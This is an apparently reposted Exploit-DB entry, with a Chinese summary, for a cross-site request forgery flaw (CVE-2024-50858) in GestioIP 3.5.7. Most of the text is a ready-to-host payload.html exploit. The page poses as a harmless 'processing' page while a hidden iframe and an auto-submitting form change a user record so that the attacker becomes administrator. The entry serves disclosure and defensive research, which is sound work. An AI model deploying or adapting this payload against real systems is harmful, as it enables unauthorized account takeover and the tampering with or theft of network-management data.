[remote] GestioIP 3.5.7 - Cross-Site Request Forgery (CSRF)
GestioIP 3.5.7 存在 CSRF 漏洞,允许攻击者通过恶意链接执行未经授权的操作(如修改或删除数据)。该漏洞利用需用户管理功能已启用,并通过托管 payload.html 文件触发。 2025-4-14 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:2 收藏
GestioIP 3.5.7 存在 CSRF 漏洞,允许攻击者通过恶意链接执行未经授权的操作(如修改或删除数据)。该漏洞利用需用户管理功能已启用,并通过托管 payload.html 文件触发。 2025-4-14 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:2 收藏
# Exploit Title: GestioIP 3.5.7 - GestioIP Vulnerability: Auth. Cross-Site Request Forgery (CSRF)
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email : max.cybersecurity at belino.com
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50858
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-50858
### Description
The GestioIP application has many endpoints and they are vulnerable to CSRF. This allows an attacker to execute actions through the admin's browser on the application if the admin visits a malicious URL hosted by the attacker. These actions can modify, delete, or exfiltrate data from the application.
### Prerequisites
The option "Manage - Manage GestioIP - User Management" must be enabled previously.
### Usage
To exploit this vulnerability, an attacker must host ```payload.html``` on an attacker-controlled web server (python3 -m http.server 8090). When an authenticated administrator goes to the attacker's website, the CSRF will execute making the attacker an administrator.
### File: payload.html
#### example: editing user named 'maxi'
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Welcome to our site</title>
<style>
body {
font-family: Arial, sans-serif;
text-align: center;
}
.container {
margin-top: 50px;
}
iframe {
display: none;
}
</style>
</head>
<body>
<div class="container">
<h1>Thank you for visiting our site!</h1>
<p>We are processing your request, please wait a moment...</p>
<img src="https://placehold.co/150?text=Processing" alt="Processing...">
</div>
<!-- hidden iframe -->
<iframe name="hiddenFrame"></iframe>
<!-- The form that makes the POST to GestioIP Server -->
<form action="[http://localhost/gestioip/res/ip_mod_user.cgi](http://localhost/gestioip/res/ip_mod_user.cgi)" method="POST" target="hiddenFrame">
<input type="hidden" name="name" value="maxi">
<input type="hidden" name="group_id" value="1">
<input type="hidden" name="email" value="[email protected]">
<input type="hidden" name="phone" value="123">
<input type="hidden" name="comment" value="">
<input type="hidden" name="client_id" value="1">
<input type="hidden" name="id" value="2">
<input type="hidden" name="B2" value="">
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
文章来源: https://www.exploit-db.com/exploits/52200
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh